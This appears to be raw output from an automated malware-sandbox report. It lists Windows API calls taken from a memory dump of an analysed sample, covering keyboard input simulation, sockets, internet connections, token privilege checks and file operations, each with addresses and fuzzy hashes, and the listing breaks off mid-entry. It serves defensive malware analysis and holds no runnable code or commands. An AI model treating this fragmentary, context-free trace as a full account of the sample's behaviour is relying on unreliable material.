                            • VariantInit.OLEAUT32(?), ref: 00DB80D9
                            • VariantClear.OLEAUT32(?), ref: 00DB83AA
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                            • String ID:
                            • API String ID: 780911581-0
                            • Opcode ID: 9987928e265e3a1032905a1753c4555044ca3030b404100990c921359ce15284
                            • Instruction ID: 5b00db382b9c667c9756d250de1413bf8c0e57cbdf2b6d761c64fc5f7e58d1f3
                            • Opcode Fuzzy Hash: 9987928e265e3a1032905a1753c4555044ca3030b404100990c921359ce15284
                            • Instruction Fuzzy Hash: C8A15875604701DFCB10DF69C891A6AB7E8FF89364F084458F9969B3A1CB30EC05DBA6
                            APIs
                            • ProgIDFromCLSID.OLE32(?,00000000), ref: 00D976EA
                            • CoTaskMemFree.OLE32(00000000), ref: 00D97702
                            • CLSIDFromProgID.OLE32(?,?), ref: 00D97727
                            • _memcmp.LIBCMT ref: 00D97748
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FromProg$FreeTask_memcmp
                            • String ID:
                            • API String ID: 314563124-0
                            • Opcode ID: bc66d8f1f661e604b568a368efa1ace5469dc472b4533fac5b92aa1a51440ccb
                            • Instruction ID: 1cf9dd38df197d6046a2de7ee142bd6bb6bb06be73ef4e69b412838301ed48ff
                            • Opcode Fuzzy Hash: bc66d8f1f661e604b568a368efa1ace5469dc472b4533fac5b92aa1a51440ccb
                            • Instruction Fuzzy Hash: 8581EA75A10109EFCF04DFA4C984EEEB7B9FF89315F244558E505AB250DB71AE06CB60
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Variant$AllocClearCopyInitString
                            • String ID:
                            • API String ID: 2808897238-0
                            • Opcode ID: 015a12eb172295adecb429dea9b7e8d8dc06f7662807339eaef62086b5bb2128
                            • Instruction ID: 1ca8c561bb92ef63b51785dfe1ef74803ee8a93ced29615c9ef7d2323b764756
                            • Opcode Fuzzy Hash: 015a12eb172295adecb429dea9b7e8d8dc06f7662807339eaef62086b5bb2128
                            • Instruction Fuzzy Hash: 88518F74604302ABDF24AF65D891A6EB3A5EF45310F24D81FE596EB291EB74D8408B31
                            APIs
                            • GetWindowRect.USER32(00935190,?), ref: 00DC9863
                            • ScreenToClient.USER32(00000002,00000002), ref: 00DC9896
                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 00DC9903
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$ClientMoveRectScreen
                            • String ID:
                            • API String ID: 3880355969-0
                            • Opcode ID: 43a74662a1b50d322a0799c5bae24e3b7f5d16ee0ece45151be6e10a10d3708e
                            • Instruction ID: 0f11554db24cc4dbac1c124cd7816c7b6b9aaed6ceb5377fe570cb71d46b6298
                            • Opcode Fuzzy Hash: 43a74662a1b50d322a0799c5bae24e3b7f5d16ee0ece45151be6e10a10d3708e
                            • Instruction Fuzzy Hash: 48510D35A00206AFDF14CF54C894EAEBBB5EF55360F14816DF8559B2A0DB31AD81CFA0
                            APIs
                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00D99AD2
                            • __itow.LIBCMT ref: 00D99B03
                              • Part of subcall function 00D99D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00D99DBE
                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00D99B6C
                            • __itow.LIBCMT ref: 00D99BC3
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$__itow
                            • String ID:
                            • API String ID: 3379773720-0
                            • Opcode ID: 320aa51dbbc5344dfaf843bacf57c176666718d0dc4b19467a3c0bb54c6b40d7
                            • Instruction ID: e5da9fb59846e19e761ce403086183d566c6b085d9556c72a4c2d724757212b4
                            • Opcode Fuzzy Hash: 320aa51dbbc5344dfaf843bacf57c176666718d0dc4b19467a3c0bb54c6b40d7
                            • Instruction Fuzzy Hash: 82416174A00209ABDF11EF68D895BFEBBB9EF44724F040069F905A7291DB749A44CBB1
                            APIs
                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00DB69D1
                            • WSAGetLastError.WSOCK32(00000000), ref: 00DB69E1
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00DB6A45
                            • WSAGetLastError.WSOCK32(00000000), ref: 00DB6A51
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ErrorLast$__itow__swprintfsocket
                            • String ID:
                            • API String ID: 2214342067-0
                            • Opcode ID: 1d1f97c66502d5e1960c18d585062d5e94fa98dccd6d1d554ed5ea9c6f2ed02a
                            • Instruction ID: 61e21672b9f43b39c83d76aa144b5b2030a2185cbdb06f47254cf4ec5a0d1c88
                            • Opcode Fuzzy Hash: 1d1f97c66502d5e1960c18d585062d5e94fa98dccd6d1d554ed5ea9c6f2ed02a
                            • Instruction Fuzzy Hash: 6C418D75640201AFEB60AF28CC96F6E77A5DF04B54F048428FA59AB3D2DA749D018BB1
                            APIs
                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00DCF910), ref: 00DB64A7
                            • _strlen.LIBCMT ref: 00DB64D9
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID:
                            • API String ID: 4218353326-0
                            • Opcode ID: ab36bf761651193cee9df465033a35935dfeabdbf5d7d0c896e7908f61795bac
                            • Instruction ID: 7bfe9b7f486885542300d4574bc18aba028edf4c70b470ea6778a5a26477e757
                            • Opcode Fuzzy Hash: ab36bf761651193cee9df465033a35935dfeabdbf5d7d0c896e7908f61795bac
                            • Instruction Fuzzy Hash: E0418071600104ABCB24EBA9EC96FEEB7A9EF44310F148155F81A97292EB34ED14CB70
                            APIs
                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DAB89E
                            • GetLastError.KERNEL32(?,00000000), ref: 00DAB8C4
                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DAB8E9
                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DAB915
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CreateHardLink$DeleteErrorFileLast
                            • String ID:
                            • API String ID: 3321077145-0
                            • Opcode ID: a67a70727fc1d75cc8c3c5c73988295480a5353ad71b92ffba998184794d6769
                            • Instruction ID: b1f419f7cc6e8e5e40701176f6fc4c69b0ecf2564e27baf794615b551468e0b0
                            • Opcode Fuzzy Hash: a67a70727fc1d75cc8c3c5c73988295480a5353ad71b92ffba998184794d6769
                            • Instruction Fuzzy Hash: 8D410D35600611DFCB11DF19C495A5ABBE1EF8A320F198099ED4A9B362CB35FD02CBB1
                            APIs
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00DC88DE
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: InvalidateRect
                            • String ID:
                            • API String ID: 634782764-0
                            • Opcode ID: f59f19ab5f37a6d26a971816adec98a026360688dc1148d47377fb947bee781e
                            • Instruction ID: 8eea344ea5209f9e5cacbcb8f0ec3a05aacc15c5f0f5d7b847773dd41b29d71d
                            • Opcode Fuzzy Hash: f59f19ab5f37a6d26a971816adec98a026360688dc1148d47377fb947bee781e
                            • Instruction Fuzzy Hash: 8731C33464020BAFEB249B58DC45FB977A5EB09310F98411AFA51E72A1CF71D980BF72
                            APIs
                            • ClientToScreen.USER32(?,?), ref: 00DCAB60
                            • GetWindowRect.USER32(?,?), ref: 00DCABD6
                            • PtInRect.USER32(?,?,00DCC014), ref: 00DCABE6
                            • MessageBeep.USER32(00000000,?,?,?,?,00DCC014,?,?,?), ref: 00DCAC57
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Rect$BeepClientMessageScreenWindow
                            • String ID:
                            • API String ID: 1352109105-0
                            • Opcode ID: ab1b7e9cda4a84cd1927008c9ab7cd53e7bc2f5d6a2b419099f58f7a556034ee
                            • Instruction ID: 3a8890ef3e9f859a41b60ac55b3dd3411931d4f11f23bdd1d9c10ab6368ad6ec
                            • Opcode Fuzzy Hash: ab1b7e9cda4a84cd1927008c9ab7cd53e7bc2f5d6a2b419099f58f7a556034ee
                            • Instruction Fuzzy Hash: B8416A3960021A9FCB16DF5CC984FA97BF6FB49304F1881A9E8549B260D731A841CFB2
                            APIs
                            • GetKeyboardState.USER32(?), ref: 00DA0B27
                            • SetKeyboardState.USER32(00000080), ref: 00DA0B43
                            • PostMessageW.USER32 ref: 00DA0BA9
                            • SendInput.USER32(00000001,00000000,0000001C), ref: 00DA0BFB
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: KeyboardState$InputMessagePostSend
                            • String ID:
                            • API String ID: 432972143-0
                            • Opcode ID: 88ef64eca2485b672c081e42d655a371c5f51684b49e2b89e63768f759952298
                            • Instruction ID: ac336b2f497bc5d46c1c84809df71f396c39b76ef15fc5976c6107c87f5f13f0
                            • Opcode Fuzzy Hash: 88ef64eca2485b672c081e42d655a371c5f51684b49e2b89e63768f759952298
                            • Instruction Fuzzy Hash: 3931F870A40318AEFF308F25CD05BFABFA6AB47314F0C425AF595921D1C37589459775
                            APIs
                            • GetKeyboardState.USER32(?), ref: 00DA0C66
                            • SetKeyboardState.USER32(00000080), ref: 00DA0C82
                            • PostMessageW.USER32 ref: 00DA0CE1
                            • SendInput.USER32(00000001,?,0000001C), ref: 00DA0D33
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: KeyboardState$InputMessagePostSend
                            • String ID:
                            • API String ID: 432972143-0
                            • Opcode ID: ffd07191c19b771b0d9ec19fd8400e0f493e59bec30e11ca3ae224f6003b6363
                            • Instruction ID: 7f19ec162d76644329727e400e88a377e1e881f897abf384b19b00aeca108c74
                            • Opcode Fuzzy Hash: ffd07191c19b771b0d9ec19fd8400e0f493e59bec30e11ca3ae224f6003b6363
                            • Instruction Fuzzy Hash: DC3126319403186FFF308B65C805BFEBFAAAB47320F08831AE585925D1C339999587B2
                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D761FB
                            • __isleadbyte_l.LIBCMT ref: 00D76229
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00D76257
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00D7628D
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: c1496b1cbff9f46e483779fd5094b8208ee9bed6f22c14743a8ff2b87a7f666b
                            • Instruction ID: c3fd871a66ee98a1c81d57817df94109ebc9fdab045196d92902b93c64bd53b3
                            • Opcode Fuzzy Hash: c1496b1cbff9f46e483779fd5094b8208ee9bed6f22c14743a8ff2b87a7f666b
                            • Instruction Fuzzy Hash: 9231CE30600B46AFDB219F65CC48BAA7BA9FF41310F198128E868971A2F731D950DBB0
                            APIs
                            • GetForegroundWindow.USER32 ref: 00DC4F02
                              • Part of subcall function 00DA3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DA365B
                              • Part of subcall function 00DA3641: GetCurrentThreadId.KERNEL32(00000000,?,00DA5005), ref: 00DA3662
                              • Part of subcall function 00DA3641: AttachThreadInput.USER32(00000000,?,00DA5005), ref: 00DA3669
                            • GetCaretPos.USER32(?), ref: 00DC4F13
                            • ClientToScreen.USER32(00000000,?), ref: 00DC4F4E
                            • GetForegroundWindow.USER32 ref: 00DC4F54
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                            • String ID:
                            • API String ID: 2759813231-0
                            • Opcode ID: 049ed03d3161b1d3a0eb949b23269d021456c21d16e88eb094436a87549069ab
                            • Instruction ID: 2e11ca46317548ad4794da691e1133c62a71892d87b497132df93547373e4401
                            • Opcode Fuzzy Hash: 049ed03d3161b1d3a0eb949b23269d021456c21d16e88eb094436a87549069ab
                            • Instruction Fuzzy Hash: 75310C71D00209AFDB00EFAAC995EEFB7F9EF99300B10406AE455E7241DA719E058BB0
                            APIs
                              • Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623
                            • GetCursorPos.USER32(?), ref: 00DCC4D2
                            • TrackPopupMenuEx.USER32 ref: 00DCC4E7
                            • GetCursorPos.USER32(?), ref: 00DCC534
                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00D7B9AB,?,?,?), ref: 00DCC56E
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                            • String ID:
                            • API String ID: 2864067406-0
                            • Opcode ID: b90979a1746d65b67320865a706a60438f73cffd7ff9dbc24d2a3714e024243c
                            • Instruction ID: e604d6a4909e904accbfa1d6e49824d0864da92f0012fe2f2e92a9dd820a6d22
                            • Opcode Fuzzy Hash: b90979a1746d65b67320865a706a60438f73cffd7ff9dbc24d2a3714e024243c
                            • Instruction Fuzzy Hash: 0F319135620059AFCB158F58C858EFA7BB6EB09310F484169FA099B2A1C731ED50DFB4
                            APIs
                              • Part of subcall function 00D9810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D98121
                              • Part of subcall function 00D9810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D9812B
                              • Part of subcall function 00D9810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D9813A
                              • Part of subcall function 00D9810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D98141
                              • Part of subcall function 00D9810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D98157
                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00D986A3
                            • _memcmp.LIBCMT ref: 00D986C6
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D986FC
                            • HeapFree.KERNEL32(00000000), ref: 00D98703
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                            • String ID:
                            • API String ID: 1592001646-0
                            • Opcode ID: 8f5514d0eafc5bcdcdb8d7f1609b39bdc396d489a6d33244b99aa8c5474a2efd
                            • Instruction ID: 7e55a424237088c9a9c27a2f5d3a1192092c01d607929348e75b258a14c0f6a1
                            • Opcode Fuzzy Hash: 8f5514d0eafc5bcdcdb8d7f1609b39bdc396d489a6d33244b99aa8c5474a2efd
                            • Instruction Fuzzy Hash: F2218E71E40209EFDF10DFA8C949BEEB7B9EF45704F194059E444AB240DB31AE05DB60
                            APIs
                            • __setmode.LIBCMT ref: 00D609AE
                              • Part of subcall function 00D45A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00DA7896,?,?,00000000), ref: 00D45A2C
                              • Part of subcall function 00D45A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00DA7896,?,?,00000000,?,?), ref: 00D45A50
                            • _fprintf.LIBCMT ref: 00D609E5
                            • OutputDebugStringW.KERNEL32(?), ref: 00D95DBB
                              • Part of subcall function 00D64AAA: _flsall.LIBCMT ref: 00D64AC3
                            • __setmode.LIBCMT ref: 00D60A1A
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                            • String ID:
                            • API String ID: 521402451-0
                            • Opcode ID: 00ccc611812461765606c60f1bf61ec3b33ff4d13bf6ff9ee2e67d4f4ba58fd8
                            • Instruction ID: 9fd1f47f15228add9bd84e1c270de0f643b4b54c778155504cd31ed0164baeeb
                            • Opcode Fuzzy Hash: 00ccc611812461765606c60f1bf61ec3b33ff4d13bf6ff9ee2e67d4f4ba58fd8
                            • Instruction Fuzzy Hash: DB11E4329042047FDB04B7F4AC479FFBBA9DF46320F240156F205A7293EE21584697B5
                            APIs
                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DB17A3
                              • Part of subcall function 00DB182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DB184C
                              • Part of subcall function 00DB182D: InternetCloseHandle.WININET(00000000), ref: 00DB18E9
                            Similarity
                            • API ID: Internet$CloseConnectHandleOpen
                            • String ID:
                            • API String ID: 1463438336-0
                            • Opcode ID: 41c52f70fad2a34e10ad1eff8035cb98702dedfa7e093666906b1d71464640e2
                            • Instruction ID: 051e93a48eb5bed4837335f6449d4beab8f8244878e24c980841e6f6ccc8f658
                            • Opcode Fuzzy Hash: 41c52f70fad2a34e10ad1eff8035cb98702dedfa7e093666906b1d71464640e2
                            • Instruction Fuzzy Hash: C821953A200606FFDB125F609C11FFAB7AAFF48711F54402AF956D6650DB71D81197B0
                            APIs
                            • GetFileAttributesW.KERNEL32(?,00DCFAC0), ref: 00DA3A64
                            • GetLastError.KERNEL32 ref: 00DA3A73
                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00DA3A82
                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00DCFAC0), ref: 00DA3ADF
                            Similarity
                            • API ID: CreateDirectory$AttributesErrorFileLast
                            • String ID:
